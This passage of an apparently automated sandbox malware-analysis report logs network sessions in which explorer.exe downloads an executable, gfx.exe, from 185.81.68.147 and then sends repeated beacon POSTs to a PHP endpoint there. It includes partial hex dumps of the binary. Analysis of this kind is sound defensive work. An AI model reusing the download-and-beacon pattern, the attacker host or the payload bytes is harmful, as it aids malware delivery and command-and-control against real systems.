                                                                                                                                                                                                Dec 13, 2024 08:19:02.743732929 CET1236INData Raw: 01 00 00 00 eb 42 ff 15 ec 43 00 00 3d b7 00 00 00 75 1d 48 8b 4c 24 20 ff 15 e2 43 00 00 48 8b 4c 24 20 ff 15 8f 41 00 00 b8 01 00 00 00 eb 18 48 8b 4c 24 20 ff 15 c5 43 00 00 48 8b 4c 24 20 ff 15 72 41 00 00 33 c0 48 83 c4 38 c3 cc cc cc cc cc
                                                                                                                                                                                                Data Ascii: BC=uHL$ CHL$ AHL$ CHL$ rA3H8HL$HXH$@D$ HFODHL$0Hn3HD$(L2DHo3HL$0HRFDAH@FGDCH&FB
                                                                                                                                                                                                Dec 13, 2024 08:19:02.743748903 CET1236INData Raw: 2b 83 7c 24 24 06 72 0e 83 7c 24 24 06 75 0b 83 7c 24 28 01 73 04 b0 01 eb 14 83 7c 24 24 06 75 0b 83 7c 24 28 01 75 04 b0 01 eb 02 32 c0 48 81 c4 40 01 00 00 5f c3 cc cc cc cc cc cc cc cc cc 48 81 ec 78 02 00 00 e8 38 dc ff ff e8 af fd ff ff 0f
                                                                                                                                                                                                Data Ascii: +|$$r|$$u|$(s|$$u|$(u2H@_Hx8t3?D$0T$0HL$@MH/HL$@ltOH;uH/t3<3tP<3<H/HL$@t
                                                                                                                                                                                                Dec 13, 2024 08:19:02.863626957 CET1236INData Raw: fe ff ff 48 8b 84 24 90 00 00 00 48 89 44 24 20 45 33 c9 45 33 c0 ba 1a 00 00 00 33 c9 ff 15 ed 36 00 00 48 8d 15 22 2c 00 00 48 8b 8c 24 90 00 00 00 ff 15 c8 3a 00 00 48 8d 54 24 30 48 8b 8c 24 90 00 00 00 ff 15 b5 3a 00 00 33 d2 48 8b 8c 24 90
                                                                                                                                                                                                Data Ascii: H$HD$ E3E336H",H$:HT$0H$:3H$58H$:H+H$}:HT$0H$j:H+H$U:H_HT$HL$WH@HD$0HD$ AE3H+H


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                6192.168.2.1149761185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:03.869198084 CET232OUTGET /gfx.exe HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196091890 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:04 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                Last-Modified: Thu, 12 Dec 2024 07:53:47 GMT
                                                                                                                                                                                                ETag: "6bc00-6290e03a93110"
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Content-Length: 441344
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd b6 42 53 99 d7 2c 00 99 d7 2c 00 99 d7 2c 00 8d bc 2f 01 94 d7 2c 00 8d bc 29 01 23 d7 2c 00 cb a2 28 01 8b d7 2c 00 cb a2 2f 01 8f d7 2c 00 cb a2 29 01 c0 d7 2c 00 a8 8b d1 00 9b d7 2c 00 8d bc 28 01 8e d7 2c 00 8d bc 2d 01 8a d7 2c 00 99 d7 2d 00 6a d7 2c 00 55 a2 25 01 98 d7 2c 00 55 a2 d3 00 98 d7 2c 00 55 a2 2e 01 98 d7 2c 00 52 69 63 68 99 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8b 96 5a 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 fa 04 00 00 00 02 00 00 00 00 00 aa a6 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 [TRUNCATED]
                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$BS,,,/,)#,(,/,),,(,-,-j,U%,U,U.,Rich,PELZg@0@FE88@<.textz `.rdataIJ@@.datam`,H@.rsrct@@.relocEFv@B
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196140051 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 60
                                                                                                                                                                                                Data Ascii: h`DYhDYj hEdnF6hDYj hEtF5h DYjhETuF5hDYj h$EoF5hDyYjh
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196156025 CET1236INData Raw: d3 45 00 b9 fc 72 46 00 e8 af 31 02 00 68 e0 de 44 00 e8 79 8f 02 00 59 c3 cc cc cc 6a 04 68 24 d3 45 00 b9 0c 72 46 00 e8 8f 31 02 00 68 40 df 44 00 e8 59 8f 02 00 59 c3 cc cc cc 6a 04 68 2c d3 45 00 b9 78 77 46 00 e8 6f 31 02 00 68 a0 df 44 00
                                                                                                                                                                                                Data Ascii: ErF1hDyYjh$ErF1h@DYYjh,ExwFo1hD9Yjh4EsFO1hDYjh<EhxF/1h`DYjhDE<uF1hDYjhLElF0h DYjhTElF0hD
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196275949 CET1236INData Raw: 8a 02 00 59 c3 cc cc cc 6a 08 68 fc d4 45 00 b9 40 79 46 00 e8 cf 2c 02 00 68 80 ed 44 00 e8 99 8a 02 00 59 c3 cc cc cc 6a 14 68 08 d5 45 00 b9 04 77 46 00 e8 af 2c 02 00 68 e0 ed 44 00 e8 79 8a 02 00 59 c3 cc cc cc 6a 10 68 20 d5 45 00 b9 54 6c
                                                                                                                                                                                                Data Ascii: YjhE@yF,hDYjhEwF,hDyYjh ETlF,h@DYYjh4EoFo,hD9Yjh<EqFO,hDYjhXEnF/,h`DYjhlEqF,hDYjhxErF
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196290970 CET1236INData Raw: e8 0f 28 02 00 68 c0 fb 44 00 e8 d9 85 02 00 59 c3 cc cc cc 6a 04 68 78 d9 45 00 b9 e4 75 46 00 e8 ef 27 02 00 68 20 fc 44 00 e8 b9 85 02 00 59 c3 cc cc cc 6a 04 68 80 d9 45 00 b9 d4 6d 46 00 e8 cf 27 02 00 68 80 fc 44 00 e8 99 85 02 00 59 c3 cc
                                                                                                                                                                                                Data Ascii: (hDYjhxEuF'h DYjhEmF'hDYjhEmF'hDyYjhEtF'h@DYYjhEtFo'hD9Yj hEuFO'hDYjhE,pF/'h`DY
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196306944 CET1236INData Raw: 59 c3 68 66 08 45 00 e8 08 81 02 00 59 c3 cc cc 55 8b ec 56 8b 75 0c 85 f6 75 05 33 c0 5e 5d c3 85 c9 75 18 e8 29 f3 02 00 c7 00 16 00 00 00 e8 d5 d0 02 00 b8 16 00 00 00 5e 5d c3 57 8b 7d 08 85 ff 74 19 81 fe d0 07 00 00 77 11 56 57 51 e8 6c 91
                                                                                                                                                                                                Data Ascii: YhfEYUVuu3^]u)^]W}twVWQl3_^]hjQu_^]v"g_"^]pFUujujQpQeH]
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196322918 CET1236INData Raw: 41 04 56 8b 75 08 8b 56 04 3b 42 04 75 0e 8b 06 3b 45 0c 75 07 b0 01 5e 5d c2 08 00 32 c0 5e 5d c2 08 00 cc cc cc cc cc cc cc cc cc c7 01 01 00 00 00 8b c1 c7 41 04 ac 6b 46 00 c3 53 8b dc 83 ec 08 83 e4 f8 83 c4 04 55 8b 6b 04 89 6c 24 04 8b ec
                                                                                                                                                                                                Data Ascii: AVuV;Bu;Eu^]2^]AkFSUkl$jhDdPSX$aF3EVWPEd}CMP}CsEEMtDU+r AE: ECEfDjhxEEMuj/uMQ
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196495056 CET1236INData Raw: 00 8b 75 08 89 75 ec c7 45 fc 00 00 00 00 ff 76 10 8b 46 0c ff d0 56 c7 45 fc 02 00 00 00 e8 1d 57 02 00 6a 14 56 e8 56 77 02 00 83 c4 10 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b 4d f0 33 cd e8 c4 70 02 00 8b e5 5d c3 55 8b ec 83 ec 10 56 6a 14 e8
                                                                                                                                                                                                Data Ascii: uuEvFVEWjVVwMdY^M3p]UVjtMEWVuFF,@vNFVu^]Q(hEM[hDFEPUjhDdPV$aF3PEdVE
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196549892 CET1236INData Raw: 00 50 e8 10 5e 02 00 50 e8 0a 5e 02 00 0f 1f 00 69 31 40 00 69 31 40 00 69 31 40 00 69 31 40 00 cc cc cc cc 55 8b ec 6a ff 68 80 8c 44 00 64 a1 00 00 00 00 50 51 56 a1 24 61 46 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 8b 0e 85 c9 74 10 83 c8
                                                                                                                                                                                                Data Ascii: P^P^i1@i1@i1@i1@UjhDdPQV$aF3PEdtAHuPMdY^]UjhDdPV$aF3PEduuEPjMdY^]UEVXEtjVq
                                                                                                                                                                                                Dec 13, 2024 08:19:05.196566105 CET1236INData Raw: 04 50 e8 a4 4b 02 00 83 c4 04 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c3 e8 aa bd 02 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 56 8b f1 e8 04 fd 01 00 85 c0 75 08 8d 50 01 e8 c8 14 02 00 83 ec 08 8d 46 04 8b cc 50 e8
                                                                                                                                                                                                Data Ascii: PKMdY^]UQVuPFPUSM]]VCCCQAU;t-W+KEWsusuV}K_^[]UVWMw;tCA+
                                                                                                                                                                                                Dec 13, 2024 08:19:05.316378117 CET1236INData Raw: 74 36 8b 5d e8 8d 7e 50 53 e8 99 58 02 00 83 c4 04 85 c0 0f 85 8f 00 00 00 83 7f 64 02 7d 10 53 57 e8 f5 4b 02 00 83 c4 08 83 7f 64 02 7c f0 53 e8 97 58 02 00 83 c4 04 83 7e 0c 00 8d 4e 0c 75 6d 8b 4e 04 33 c0 83 f9 04 0f 94 c0 40 8b 4d f4 64 89
                                                                                                                                                                                                Data Ascii: t6]~PSXd}SWKd|SX~NumN3@MdY_^[]PTPTuu MPE/MEsNPSUjhDdP(SVW$aF3PEdE}M


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                7192.168.2.1149768185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:06.757635117 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:06.877407074 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:08.212950945 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:07 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                8192.168.2.1149773185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:08.460688114 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:08.580501080 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:09.900758028 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:09 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                9192.168.2.1149779185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:10.136650085 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:10.258452892 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:11.606226921 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:10 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                10192.168.2.1149785185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:11.836623907 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:11.956605911 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:13.432131052 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:12 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                11192.168.2.1149791185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:13.724195957 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:13.846744061 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:15.287345886 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:14 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                12192.168.2.1149793185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:15.523392916 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:15.644877911 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:17.122733116 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:16 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                13192.168.2.1149798185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:17.351145983 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:17.471020937 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:18.837704897 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:18 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                14192.168.2.1149804185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:19.071274996 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:19.191257954 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:20.711608887 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:19 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                15192.168.2.1149810185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:20.945025921 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:21.064807892 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:22.541472912 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:21 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                16192.168.2.1149812185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:22.806682110 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:22.927994967 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:24.422614098 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:23 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                17192.168.2.1149818185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:24.650079966 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:24.769917011 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:26.106290102 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:25 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                18192.168.2.1149823185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:26.335807085 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:26.455518961 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:27.946985960 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:26 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                19192.168.2.1149829185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:19:28.179421902 CET278OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                Dec 13, 2024 08:19:28.299335003 CET6OUTData Raw: 44 0a 58 05
                                                                                                                                                                                                Data Ascii: DX
                                                                                                                                                                                                Dec 13, 2024 08:19:29.788844109 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:19:28 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                20192.168.2.1149835185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
